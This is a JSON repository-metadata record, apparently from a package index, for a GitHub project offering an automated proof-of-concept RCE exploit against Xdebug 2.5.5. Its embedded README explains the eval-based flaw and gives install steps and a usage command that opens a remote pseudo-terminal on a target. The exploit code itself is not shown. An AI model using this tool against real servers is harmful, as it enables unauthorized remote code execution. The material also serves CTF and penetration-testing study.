{"id":20173762,"url":"https://github.com/d3ext/xdebug-exploit","last_synced_at":"2025-07-19T15:03:03.295Z","repository":{"id":41803335,"uuid":"510351282","full_name":"D3Ext/xdebug-exploit","owner":"D3Ext","description":"xdebug 2.5.5 RCE exploit","archived":false,"fork":false,"pushed_at":"2025-01-16T13:04:04.000Z","size":56,"stargazers_count":30,"open_issues_count":0,"forks_count":9,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-04-10T03:17:26.456Z","etag":null,"topics":["black-hat","ctf","exploit","hacker","hacking","hackthebox","kali","mrrobot","offensive-security","oscp","owasp","php","python","rce","vuln","vulnerability","xdebug","xdebug-exploit"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/D3Ext.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-07-04T12:30:17.000Z","updated_at":"2025-02-07T08:05:22.000Z","dependencies_parsed_at":"2022-08-20T12:40:36.227Z","dependency_job_id":null,"html_url":"https://github.com/D3Ext/xdebug-exploit","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2Fxdebug-exploit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2Fxdebug-exploit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2Fxdebug-exploit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2Fxdebug-exploit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/D3Ext","download_url":"https://codeload.github.com/D3Ext/xdebug-exploit/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248148247,"owners_count":21055548,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["black-hat","ctf","exploit","hacker","hacking","hackthebox","kali","mrrobot","offensive-security","oscp","owasp","php","python","rce","vuln","vulnerability","xdebug","xdebug-exploit"],"created_at":"2024-11-14T01:37:48.752Z","updated_at":"2025-04-10T03:17:36.933Z","avatar_url":"https://github.com/D3Ext.png","language":"Python","readme":"# xdebug 2.5.5 RCE\n\nAn automated POC exploit of the xdebug 2.5.5 RCE vulnerability\n\n## Vulnerability\n\nThis vulnerability can be abused due to the eval command present in Xdebug versions 2.5.5 and below. This allows the attacker to execute arbitrary php code as the context of the web user.\n\n## Installation\n\n\u003e Download from source\n```sh\ngit clone https://github.com/D3Ext/xdebug-exploit\ncd xdebug-exploit\npip3 install -r requirements.txt\npython3 exploit.py\n```\n\n## Usage\n\nJust execute the exploit and especify a valid URL with a PHP file like `index.php` and the local host. Then the exploit will try to establish a pseudo-terminal which allows you to execute commands\n\n```sh\npython3 exploit.py -u http://10.10.10.83/index.php -l 10.10.16.3\n```\n\n\\* *In some cases the output won't be reflected at all and you will only see the first line of the executed command, this is not a problem of the script, the vuln works like this)*\n\n## References\n\n```\nhttps://www.exploit-db.com/exploits/44568\nhttps://www.tenable.com/plugins/nessus/112210\nhttps://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/\n```\n\n## Disclaimer\n\nUse this exploit under your own responsability! The author is not responsible of any bad usage of it.\n\n## License\n\nThis project is under [MIT](https://github.com/D3Ext/xdebug-exploit/blob/main/LICENSE) license\n\nCopyright © 2025, *D3Ext*\n\n\n\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd3ext%2Fxdebug-exploit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fd3ext%2Fxdebug-exploit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd3ext%2Fxdebug-exploit/lists"}